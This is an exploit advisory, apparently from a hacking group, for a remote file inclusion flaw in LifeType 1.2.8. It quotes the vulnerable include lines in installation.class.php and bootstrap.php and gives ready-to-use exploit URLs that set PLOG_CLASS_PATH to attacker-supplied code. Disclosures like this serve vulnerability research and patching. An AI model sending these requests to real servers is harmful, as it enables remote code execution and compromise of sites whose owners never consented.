/===============================================================================================================================================\
|
| [o] LifeType 1.2.8 Remote File Inclusion Vulnerability
|
| Software : LifeType 1.2.8
| Vendor : http://lifetype.net/
| Author : Cru3l.b0y
| Contact : [email protected]
| Home : WwW.DeltaHacking.Net
|===============================================================================================================================================|
|
| [o] Vulnerable file
|
| install/installation.class.php
|
| include_once( PLOG_CLASS_PATH."config/config.properties.php" );
|
|
| class/bootstrap.php
|
| include( PLOG_CLASS_PATH."class/object/loader.class.php" );
|
|
| [o] Exploit
|
| http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]
| http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]
|
|===============================================================================================================================================|